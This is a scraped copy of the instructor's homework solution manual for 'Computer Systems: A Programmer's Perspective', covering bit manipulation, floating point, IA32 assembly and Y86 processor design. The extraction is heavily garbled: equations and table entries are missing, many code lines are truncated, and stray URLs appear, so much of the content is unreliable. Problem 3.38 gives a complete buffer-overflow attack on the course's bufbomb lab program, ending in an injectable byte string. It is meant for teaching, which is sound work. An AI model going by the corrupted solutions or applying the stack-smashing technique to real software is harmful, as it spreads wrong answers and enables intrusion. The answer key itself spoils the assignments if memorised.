当前位置:文档之家› 深入理解计算机系统习题答案

深入理解计算机系统习题答案

深入理解计算机系统习题答案
深入理解计算机系统习题答案

Computer Systems:A Programmer’s Perspective Instructor’s Solution Manual1

Randal E.Bryant

David R.O’Hallaron

December4,2003

2

Chapter1

Solutions to Homework Problems

The text uses two different kinds of exercises:

Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.

Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.

This document gives the solutions to the homework problems.

1.1Chapter1:A Tour of Computer Systems

1.2Chapter2:Representing and Manipulating Information

Problem2.40Solution:

This exercise should be a straightforward variation on the existing code.

2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS

10

11void show_double(double x)

12{

13show_bytes((byte_pointer)&x,sizeof(double));

14}

code/data/show-ans.c 1int is_little_endian(void)

2{

3/*MSB=0,LSB=1*/

4int x=1;

5

6/*Return MSB when big-endian,LSB when little-endian*/

7return(int)(*(char*)&x);

8}

1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:

code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.

Problem2.45Solution:

This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.

A.The C standard does not de?ne the effect of a shift by32of a32-bit datum.On the SPARC(and

many other machines),the expression x<

https://www.doczj.com/doc/c22015421.html,pute beyond_msb as2<<31.

C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get the

desired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.

Problem2.46Solution:

This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.

A.The function does not perform any sign extension.For example,if we attempt to extract byte0from

word0xFF,we will get255,rather than.

B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and to

perform sign extension at the same time.First,we perform a left shift so that the most signi?cant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time.

4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);

4return left>>24;

5}

Problem2.48Solution:

This problem lets students rework the proof that complement plus increment performs negation.

We make use of the property that two’s complement addition is associative,commutative,and has additive https://www.doczj.com/doc/c22015421.html,ing C notation,if we de?ne y to be x-1,then we have?y+1equal to-y,and hence?y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.

Problem2.49Solution:

This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.

As seen in Equation2.16we have.The?nal term has no effect on the-bit representation of,but the middle term represents a correction factor that must be added to the high order bits.This is implemented as follows:

code/data/uhp-ans.c Problem2.50Solution:

1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5

A.:x+(x<<2)

B.:x+(x<<3)

C.:(x<<4)-(x<<1)

D.:(x<<3)-(x<<6)

Problem2.51Solution:

Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.

A..

?((1<

B..

((1<

Problem2.52Solution:

Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.

code/data/rbyte-ans.c Problem2.53Solution:

These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.

6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)

2{

3/*Perform shift arithmetically*/

4unsigned xsra=(int)x>>k;

5/*Make mask of low order32-k bits*/

6unsigned mask=k?((1<<(32-k))-1):?0;

7

8return xsra&mask;

9}

code/data/rshift-ans.c 1int sra(int x,int k)

2{

3/*Perform shift logically*/

4int xsrl=(unsigned)x>>k;

5/*Make mask of high order k bits*/

6unsigned mask=k??((1<<(32-k))-1):0;

7

8return(x<0)?mask|xsrl:xsrl;

9}

1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7

B.(a)For,we have,,

code/data/?oatge-ans.c 1int float_ge(float x,float y)

2{

3unsigned ux=f2u(x);

4unsigned uy=f2u(y);

5unsigned sx=ux>>31;

6unsigned sy=uy>>31;

7

8return

9(ux<<1==0&&uy<<1==0)||/*Both are zero*/

10(!sx&&sy)||/*x>=0,y<0*/

11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/

12(sx&&sy&&ux<=uy);/*x<0,y<0*/

13}

,

8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.

Description Extended precision

Value

Smallest denorm.

Largest norm.

Problem2.59Solution:

We have found that working through?oating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEE?oating point more concrete.

Description

8000

Smallest value

4700

Largest denormalized

——

1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS9

1/*Compute2**x*/

2float fpwr2(int x){

3

4unsigned exp,sig;

5unsigned u;

6

7if(x<-149){

8/*Too small.Return0.0*/

9exp=0;

10sig=0;

11}else if(x<-126){

12/*Denormalized result*/

13exp=0;

14sig=1<<(x+149);

15}else if(x<128){

16/*Normalized result.*/

17exp=x+127;

18sig=0;

19}else{

20/*Too big.Return+oo*/

21exp=255;

22sig=0;

23}

24u=exp<<23|sig;

25return u2f(u);

26}

10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z)

{

int t1=y-z;

int t2=x*t1;

int t3=(t1<<31)>>31;

int t4=t3?t2;

return t4;

}

Problem3.32Solution:

This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insigni?cant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.

The following is an annotated version of the assembly code:

1movl8(%ebp),%edx x

2movl12(%ebp),%ecx y

3movl%edx,%eax

4subl%ecx,%eax result=x-y

5cmpl%ecx,%edx Compare x:y

6jge.L3if>=goto done:

7movl%ecx,%eax

8subl%edx,%eax result=y-x

9.L3:done:

A.When,it will compute?rst and then.When it just computes.

B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-

statement if the test is false.

C.

then-statement

t=test-expr;

if(t)

goto done;

else-statement

done:

D.The code in then-statement must not have any side effects,other than to set variables that are also set

1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11

Problem3.33Solution:

This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.

A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that

%edx holds result.

B.The original C code for the function is as follows:

1/*Enumerated type creates set of constants numbered0and upward*/

2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;

3

4int switch3(int*p1,int*p2,mode_t action)

5{

6int result=0;

7switch(action){

8case MODE_A:

9result=*p1;

10*p1=*p2;

11break;

12case MODE_B:

13*p2+=*p1;

14result=*p2;

15break;

16case MODE_C:

17*p2=15;

18result=*p1;

19break;

20case MODE_D:

21*p2=*p1;

22/*Fall Through*/

23case MODE_E:

24result=17;

25break;

26default:

27result=-1;

28}

29return result;

30}

Problem3.34Solution:

This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.

12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)

2{

3int result=x;

4

5switch(x){

6case50:

7case52:

8result<<=2;

9break;

10case53:

11result>>=2;

12break;

13case54:

14result*=3;

15/*Fall through*/

16case55:

17result*=result;

18/*Fall through*/

19default:

20result+=10;

21}

22

23return result;

24}

code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{

3int*Aptr=&A[i*n];

4int*Bptr=&B[k];

5int result=0;

6int cnt=n;

7

8if(n<=0)

9return result;

10

11do{

12result+=(*Aptr)*(*Bptr);

13Aptr+=1;

14Bptr+=n;

1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);

17

18return result;

19}

code/asm/structprob-ans.c 1typedef struct{

2int idx;

3int x[4];

4}a_struct;

14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/

2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE64

4void good_echo()

5{

6char buf[BUFSIZE];

7int i;

8while(1){

9if(!fgets(buf,BUFSIZE,stdin))

10return;/*End of file or error*/

11/*Print characters in buffer*/

12for(i=0;buf[i]&&buf[i]!=’\n’;i++)

13if(putchar(buf[i])==EOF)

14return;/*Error*/

15if(buf[i]==’\n’){

16/*Reached terminating newline*/

17putchar(’\n’);

18return;

19}

20}

21}

An alternative implementation is to use getchar to read the characters one at a time.

Problem3.38Solution:

Successfully mounting a buffer over?ow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return a?xed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.

Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4:

280484f4:55push%ebp

380484f5:89e5mov%esp,%ebp

480484f7:83ec18sub$0x18,%esp

580484fa:83c4f4add$0xfffffff4,%esp

680484fd:8d45f4lea0xfffffff4(%ebp),%eax

78048500:50push%eax

88048501:e86a ff ff ff call8048470

98048506:b801000000mov$0x1,%eax

10804850b:89ec mov%ebp,%esp

11804850d:5d pop%ebp

12804850e:c3ret

13804850f:90nop

We can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes

1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:

1.First,we set a breakpoint in getbuf and run the program to that point:

(gdb)break getbuf

(gdb)run

Comparing the stopping point to the disassembly,we see that it has already set up the stack frame.

2.We get the value of buf by computing a value relative to%ebp:

(gdb)print/x(%ebp+12)

This gives0xbfffefbc.

3.We?nd the saved value of register%ebp by dereferencing the current value of this register:

(gdb)print/x*$ebp

This gives0xbfffefe8.

4.We?nd the value of the return pointer on the stack,at offset4relative to%ebp:

(gdb)print/x*((int*)$ebp+1)

This gives0x8048528

We can now put this information together to generate assembly code for our attack:

1pushl$0x8048528Put correct return pointer back on stack

2movl$0xdeadbeef,%eax Alter return value

3ret Re-execute return

4.align4Round up to12

5.long0xbfffefe8Saved value of%ebp

6.long0xbfffefbc Location of buf

7.long0x00000000Padding

Note that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will over?ow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:

10:6828850408push$0x8048528

25:b8ef be ad de mov$0xdeadbeef,%eax

3a:c3ret

4b:90nop Byte inserted for alignment.

5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.

611:ef out%eax,(%dx)Trying to diassemble

712:ff(bad)data

16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:

6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000

Problem3.39Solution:

This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.

code/asm/asmprobs-ans.c Problem3.40Solution:

For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between the?oating point registers and the C code using extended asm.

code/asm/fscale.c

1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor Architecture

Problem4.32Solution:

This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.

Stage

Fetch

rA:rB M PC

valP PC

Execute

R rB valE

PC update

leave

icode:ifun M PC

Decode

valB R

valE valB

Memory

Write back

R valM

PC valP

Problem4.34Solution:

The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’

18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################

2#HCL Description of Control for Single Cycle Y86Processor SEQ#

3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#

4####################################################################

5

6##This is the solution for the iaddl and leave problems

7

8####################################################################

9#C Include’s.Don’t alter these#

10#################################################################### 11

12quote’#include

13quote’#include"isa.h"’

14quote’#include"sim.h"’

15quote’int sim_main(int argc,char*argv[]);’

16quote’int gen_pc(){return0;}’

17quote’int main(int argc,char*argv[])’

18quote’{plusmode=0;return sim_main(argc,argv);}’

19

20####################################################################

21#Declarations.Do not change/remove/delete any of these#

22#################################################################### 23

24#####Symbolic representation of Y86Instruction Codes#############

25intsig INOP’I_NOP’

26intsig IHALT’I_HALT’

27intsig IRRMOVL’I_RRMOVL’

28intsig IIRMOVL’I_IRMOVL’

29intsig IRMMOVL’I_RMMOVL’

30intsig IMRMOVL’I_MRMOVL’

31intsig IOPL’I_ALU’

32intsig IJXX’I_JMP’

33intsig ICALL’I_CALL’

34intsig IRET’I_RET’

35intsig IPUSHL’I_PUSHL’

36intsig IPOPL’I_POPL’

37#Instruction code for iaddl instruction

38intsig IIADDL’I_IADDL’

39#Instruction code for leave instruction

40intsig ILEAVE’I_LEAVE’

41

42#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer

44intsig REBP’REG_EBP’#Frame Pointer

45intsig RNONE’REG_NONE’#Special value indicating"no register"

46

47#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments

49

计算机导论试题与答案

《计算机导论》试题和答案 一、填空题(每小题1分,共20分): 1. 计算机领域中采用_________、_________、或_________来表示数值。。 2. 冯·诺依曼型计算机的两大特征是“程序存储”和“______”。 3. 美国标准信息交换代码,简称ASCII码,它是____位二进制编码,因此,它可以表示 ____种字符。 4. 计算机中采用的基本逻辑电路主意有各种______及______。 5. 用_________语言编写的程序可由计算机直接执行。 6. 串口按信息传送格式可分为_________和_________。 7. 计算机的主存储器存储直接与__交换的信息,辅助存储器存放当前不立即使用的信息。 8. 堆栈是指用作数据暂存的一组寄存器或一片存储区,它的工作方式称为______。 9. 由寻址方式形成的操作数的真正存放地址,称为操作数的______。 10. 计算机网络按距离可分为______和______。 11. 设备管理中的设备是指计算机系统的_____、_____和_____。 12. 操作系统按功能特征可分为______、______和______。 13. 高级语言的基本元素可以分为____、______、______、______和______等五大类。 14. 从根算起,树可以分为多个层次,树的_____称为树的深度。 15. _____是数据组织形式,反映数据之间的关系,但不涉及数据的具体内容。 16. 线性表的链式存储结构中,每个元素需存储两部分信息:一部分是元素本身的信息,称之“_____”;另一部分则是该元素的直接后继元素的存储位置,称之“_____”。 17. 栈是限定在_____进行插入和删除运算的线性表,其表尾称为_____,表头称为_____。 18. 用编译方法在计算机上执行用高级语言编写的程序,可分为两个阶段: _____和_____。

计算机基础试题及答案

《计算机基础》考试试题(卷) A. 显示器 B.扫描仪 C.键盘 D.鼠标 号 一、单项选题:(每题2分,共60 分) 学 1.一个完整的计算机系统包括( ) A.计算机及其外部设备 B.主机.键盘.显示器 C.系统软件和应用软件 D.硬件系统和软件系统 2.计算机应用最广泛的是( ) A.科学计算 B.数据处理 C.实时控制 D.辅助设计 3.衡量计算机存储容量的单位通常是( ) 级 班 A.块 B. 字节 C.比特 D.字长 4.( )个二进制数称为一个字节。 A.2 B.8 C.10 D.16 5. Windows 中,关闭当前窗口的快捷方式是( ) A.AIt+F4 B.AIt+F8 C.Ctrl+F4 D.Ctrl+F8 6.以下不属于输入设备的是( ) 7. POWERPOINT 作窗口的视图模式不包括( )。 A.完整视图 B.大纲视图 C.幻灯片视图 D.幻灯片浏览视图 8. 第二代计算机使用的电子器件是( )。 A.电子器 B.晶体管 C.集成电路 D.超大规模集成电路 9. 因特网所采用的网络传输协议是( )。 A.SMTP 协议 B.SNMP 协议 C.TELNET 协议 D.TCP/IP 协议 10. CPU 勺中文名称是( )。 A.运算控制单元 B.夕卜(内)存储器 C.微机系统 D. 微处理器 11. 显示器属于( )。 A.存贮器 B.运算控制单元 C.输入设备 D.输出设备 12. 菜单栏右端“X”按钮的含义是( )。

13. 计算机软件一般包括()和应用软件。 A. 实用软件 B.系统软件 C.培训软件 D. 编辑软件 14. ()推动了计算机技术和通讯的技术的发展。 A. 微型化 B.巨型化 C.智能化 D.网络化 15. 在Windows中,()是中英文输入切换健。 A.AIt+Shift B.Ctrl+Shift C.AIt+H D.Ctrl+ 空格 16. 复制快捷方式是()。 A. ctrl+V B. Ctrl+N C. Alt+K D. Ctrl+C 17. 用Windows的“写字板”创建的文件的缺省扩展名是() A.TXT B.XLS C.DOS D.ALT 18. Word程序启动后就自动打开一个名为()文档。 A.Noname B.Untitled C. 文件1 D.文档1 19. Word提供的文件打开方式不包括()。 A.直接打开 B. 以副本形式打开 C.以存储形式打开 D.用浏览器打开 20. Word中获取帮助的快捷键是()。 A.F1 B.F2 C.F5 D.F821. Word中保存文档的快捷键是()。 A.CTR W V B.CTRL + S C.CTRL + C D.CTRL + D 22. 在()视图下可以插入页眉和页角 A. 普通 B.大纲 C.页面 D.主控文档 23. Excel工作表最多有()列。 A.65535 B.256 C.254 D.128 24. Excel中,新打开的工作簿含有默认的()张工作表。 A.1 B.2 C.3 D.4 25. 在打印工作表前,能帮助及时地对版式和文字内容进行调整和修正 的是()。 A.仔细观察工作表 B.打印预览 C.按F8健 D.分页预览 26. 在幻灯片中不能插入()。 A.程序 B.视频 C.声音 D.图片 27. 在windows的回收站中,可以恢复()。 A. 从硬盘中删除的文件或文件夹 B. 从软盘中删除的文件或文件夹 C. 剪切掉的文档 D. 从光盘中删除的文件或文件夹

2017年大学计算机习题及答案

2017年大学计算机习题及答案 1. (多媒体)技术是处理文字、声音、图形、图像和影像等的综合性技术。 2. 执行一条指令的时间称为机器周期,机器周期分为(取指令)周期和(执行指令)周期。 3. 用于传送存储器单元地址或输入/输出接口地址信息的总线称为(地址总线)。 4. (机器)语言是计算机唯一能够识别并直接执行的语言。 5. 标准ASCⅡ字符集总共有(128)个编码。 6. 在计算机内用(2)个字节的二进制数码代表一个汉字。 7. 第一台电子计算机ENIAC诞生于(1946)年。 8. 对存储器而言有两种基本操作:(读操作)和(写操作)。 9. 用计算机高级语言编写的程序,通常称为(源程序)。 10. 计算机软件系统由(系统软件)和(应用软件)两部分组成。 11. 八进制数整数(从右数)第三位的位权是(64)。 12. 二进制数10110转换为十进制数是(22)2017年大学计算机习题及答案。 13. 一个指令规定了计算机能够执行一个基本操作,它的组成包括(操作码)和(地址码)。 14. 对于R进制数来说,其基数(能使用的数字符号个数)中最大数是(R-1)。

15. 3位二进制数可以表示(8)种状态。 16. 在计算机内部,数字和符号都用(二进制)代码表示。 17. 第三代电子计算机采用的电子器件是(中小规模集成电路)。 18. 按相应的顺序排列、使计算机能执行某种任务的指令集合是(程序)2017年大学计算机习题及答案。 19. 操作系统是一种(系统)软件,它是(用户)和(计算机)的接口。 20. 计算机内存的存取速度比外存储器(快)。 21. 计算机硬件中最核心的部件是(CPU(中央处理器))。 22. 计算机由(控制器)、(运算器)、(存储器)、(输入设备)和(输出设备)五部分组成,其中(控制器)和(运算器)组成CPU。 23. 计算机在工作时,内存储器用来存储(现行程序的指令和数据)。 24. KB、MB、GB都是存储容量的单位,1GB=(1024×1024)KB。 25. 计算机系统软件中的核心软件是(操作系统)。 26. 计算机的主要技术指标有(字长)、(主频)、(运算速度)、(存储容量)和(存储周期)。 27. 计算机工作时,有两种信息在执行指令过程中流动:(数据流)和(控制流)。

计算机基础题库

中等职业学校计算机等级考试模拟题(含答案) 1 冯·诺依曼原理中,计算机应包括______等功能部件。 A 运算器控制器存储器输入设备和输出设备 B 运算器存储器显示器输入设备和输出设备 C 运算器控制器存储器键盘和鼠标 D 运算器控制器硬盘输入设备和输出设备 2 按照指法要求,击打空格键,应使用______。 A 左手和右手的食指,因食指最灵活 B 左手或右手的拇指 C 左手或右手的中指 D 左手或右手的无名指 3 显示器的清晰度是由______决定的。 A 显示器的尺寸 B 显示器的类型 C 显示器的分辨率 D 计算机主机的中央处理器 4 一般来说,______中的数据不能被删除。 A 光盘 B 软盘 C 硬盘 D 内存 5 在微机的硬件系统中,______是计算机的记忆部件。 A 运算器 B 控制器 C 存储器 D 中央处理器 6 键盘打字键区的8个基准键位是指______。 A SDFGHJKL B ASDFGHJK C ASDFHJKL D ASDFJKL; 7 在微机中,______通常用来存放BIOS程序,因此也叫BIOS芯片。 A 硬盘 B 软盘 C ROM D RAM 8 对软盘进行写保护后,计算机对软盘所能进行的操作是______。 A 可以向软盘写入内容,但不能读出软盘原有的信息 B 可读出软盘原有的信息,但不能修改软盘原有的信息 C 不能进行任何操作 D 可以读出软盘原有信息,也可向软盘写入内容 9 下列设备属于外部设备的是______。 A CPU B 主板 C 显示器 D 内存条 10 以下哪种存储器不是磁介质存储设备______。 A 光盘 B 硬盘 C 3.5英寸的软盘 D 5.25英寸的软盘 11 以下对计算机显示器的说法正确的是______。 A 显示器是计算机的一种输入设备 B 显示器必须要有相应的显示卡才能工作 C 显示器可以独立工作 D 显示器的尺寸大小决定了它的亮度的高低 12 财政金融会计等事务处理软件属于______。 A 系统软件 B 操作系统 C 应用软件 D 高级语言 13 _______是计算机的输出设备。 A 打印机 B 鼠标 C 扫描仪 D 键盘 14 以下哪一种设备不是计算机的外存储设备______。 A 随机存储器(RAM) B 硬盘 C 软盘 D 光盘

计算机导论试题与答案[技巧]

计算机导论试题与答案[技巧] 计算机导论试题与答案 《计算机导论》试题和答案 一、填空题(每小题1分,共20分): 1. 计算机领域中采用_________、_________、或_________来表示数值。。 2. 冯?诺依曼型计算机的两大特征是“程序存储”和“______”。 3. 美国标准信息交换代码,简称ASCII码,它是____位二进制编码,因此,它可以表示 ____种字符。 4. 计算机中采用的基本逻辑电路主意有各种______及______。 5. 用_________语言编写的程序可由计算机直接执行。 6. 串口按信息传送格式可分为_________和_________。 7. 计算机的主存储器存储直接与,,交换的信息,辅助存储器存放当前不立即使用的信息。 8. 堆栈是指用作数据暂存的一组寄存器或一片存储区,它的工作方式称为 ______。 9. 由寻址方式形成的操作数的真正存放地址,称为操作数的 ______。 10. 计算机网络按距离可分为______和______。 11. 设备管理中的设备是指计算机系统的_____、_____和_____。 12. 操作系统按功能特征可分为______、______和______。 13. 高级语言的基本元素可以分为____、______、______、______和______等五大类。 14. 从根算起,树可以分为多个层次,树的_____称为树的深度。

15. _____是数据组织形式,反映数据之间的关系,但不涉及数据的具体内容。 16. 线性表的链式存储结构中,每个元素需存储两部分信息:一部分是元素本身的信息,称之“_____”;另一部分则是该元素的直接后继元素的存储位置,称之“_____”。 17. 栈是限定在_____进行插入和删除运算的线性表,其表尾称为_____,表头称为_____。 18. 用编译方法在计算机上执行用高级语言编写的程序,可分为两个阶段: _____和_____。 19. 从资源管理的角度,操作系统要实现对计算机系统的四类资源管理,即 ______、______、______和______。 20. 处理机管理程序中,作业调度程序的管理对象是______,进程调度和交通控制程序管理的对象是______。 二、判断题(如果错误请说明理由,每题1.5分,共15分): 1( 全加器只能实现一位二进制数相加。( ) 2( 将十进制数转换成二进制数: ( ) 3( 将十进制数转换成二进制数的补码: ( ) 4( 兼容机和原装机的软件是不兼容的。( ) 5( 并行性是指在同一时刻或在同一时间间隔内完成两种或两种以上性质相同或不同的工作,只要在时间上互相重叠都存在并行性。( ) 6( 计算机的硬、软件之间有固定不变的分界面。( ) 7( 线性表的链式存储结构的链表中的最后一个结点的指针域置为“空”,则此链表称为空表。( ) 8( 对于程序中的错误,编译程序都能有效的进行诊断和处理。( )

计算机基础习题及答案(1)

寒假班计算机基础习题一 一.单项选择 1.计算机与计算器的本质区别是能进行(4) A运算 B 存储数据C数据处理D程序控制 2.最能准确反映计算机主要功能的是(2) A计算机是一种信息处理机 B 计算机可以实现高速度的运算 C计算机能代替人的脑力劳动D计算机可以存储大量信息 3.获取指令、决定指令的执行顺序,向相应的硬件部件发送指令,只是(2)的基本功能. A.内存储器 B.控制器 C.运算器 D.输入输出设备 4.与外存储器相比,内存储器具有的(b)优点. A 存储器量大 B存取速度快C信息科长期保存D存储单位信息量价格便宜 5.汉字数据比较大小时按其(d)顺序进行的. A.在英文字母表中的 B.在字典中的 C.在ASCII码中的 D.在区位表中 6.用高级语言C++编写的源程序要执行,必须通过其语言处理程序进行(c)变成目标程序后才能实现. A解释B汇编C编译 D 翻译 7.计算机软件是指所使用的(d) A各种源程序的集合B有关文档资料C各种指令集D数据、程序和文档的集合8.闪存盘写保护口的作用是防止(c) A保护磁盘B读数据出错C数据写入D数据丢失 9.计算机的内存存储器是由许多存储单元组成的,为使计算机能识别和访问这些单元,给每

一个单位一个编号,这些编号称为(c) A名称B名号C地址D数据 10磁盘、闪存盘在使用前应进行格式化操作。所谓“格式化”是指对磁盘(c) A清除原有信息B读写信息C进行磁道和扇区的划分D文件管理11.由于计算机应用的普及,计算机已成为(b) A.生产的工具 B.信息获取,处理的工具 C. 学习的工具 D.娱乐的手段 12.七位ASCII码可以表示(b )个字符 A 127 B 128 C 31 D 96 13.通常说的RAM是指(a ) A.动态RAM(DRAM) B.静态RAM(SRAM) C. 动态RAM和静态RAM D.动态RAM或静态RAM 14. 十进制261转换为二进制数的结果为( c ) A.111111111 B.100000001 C.100000101 D.110000011 15.在汉字库中查找汉字时,输入的是汉字的机内码,输出的是汉字的(d ) A.交换码 B.信息码 C.外码 D.字形码 16.计算机在运行中突然断电,下列( b )中的信息将会丢失。 A.ROM B.RAM C.CD—ROM D.磁盘 17.Java是一种( d )的程序设计语言。 A.面向机器 B.面向过程 C.面向问题 D.面向对象 18.在下列描述中,正确的是(A )。 A 计算机存储和表示信息的基本单位是字节

大学计算机基础习题答案及解析

第1章 1.1.1 1. 单项选择题 1)A2)C3)B4)A5)C6)A 2.多项选择题 1)AB2)AB3)ABCD4)ABD5)ABCD6)ABC 3.判断题 1)F2)F 1.1.2 1. 单项选择题 1)A2)B3)A4)C5)D6)D7)A8)A9)C 2. 多项选择题 1)ABCDE2)ABC3)ABCD4)AB5)ABCD6)ABCDE 3.判断题 1)F2)T3)F4)F5)F6)T7)F 1.1.3 1. 单项选择题 1)A2)D3)A4)B5)A6)D7)C8)A9)A 10)D11)A12)D 2. 多项选择题 1)ABE2)ABCD3)ABCD4)ABC 3.判断题 1)T2)T3)F4)F5)T6)T7)T 1.1.4 1.单项选择题 1)A2)C3)D4)A5)B6)C 2. 多项选择题 1)ABCD2)ABCD3)ABE4)ABC5)ABCD 3. 判断题 1)T2)T3)T4)T5)T6)F7)F8)F 4.填空题 1)操作码地址码2)操作系统3)算术运算逻辑运算 1

4)输入设备5)控制器,运算器6)编译程序 1.1.5 1. 单项选择题 1)A2)C3)D4)A5)B6)D7)D8)A 2. 多项选择题 1)ABC2)ABD3)ABD4)ABD5)ABDE 3. 判断题 1)F2)T3)T4)T5)T6)F7)F8)T9)F 4. 填空题 1)CD-R2)RAM3)7FFF4)Personal Computer(个人计算机)5)AGP6)分辨率7)采样8)LCD 9)显示分辨率颜色质量刷新速度 1.3 一、单项选择题答案及分析: 1.A 世界上第一台真正意义的计算机ENIAC是1946年2月在美国宾夕法尼亚大学诞生的,故应选择A 2.A 显示器是输出设备,磁盘驱动器既可以看作输入设备也可以作为输出设备,而鼠标是输入设备,故应选A。 3.A 位(bit)是计算机存储数据的最小单位,简称b,也称为比特,一个二进制数就是一位 4.A 信息处理是指非数值形式的数据处理,是指以计算机技术为基础,对大量的数据进行加工处理,形成有用信息。而文字、表格、图形、声音等属于非数值形式的数据。所以数据检索应用属于信息处理的应用范围。 5.C 机器语言写出来的程序是由0和1组成的指令序列,这样计算机就能直接执行,所以机器语言是计算机系统唯一能识别的、不需要翻译直接供机器使用的程序设计语言。故选C 6.D 7.C 8.B 指令由操作码和地址码组成,操作码规定了操作类型,地址码规定了要操作的阿数据存放在什么地址中,以及操作结果存放到哪个地址中。 9.C 从ENIAC到现在计算机发生翻天覆地的变化,依据计算机采用的主要元器件的不同,将计算机的发展分为了四代,故应选C 10.B 11.B 在计算机中,采用的是二进制数,所有数据都是以二进制的形式表示和存储,故应选B 12.D

计算机基础知识题库

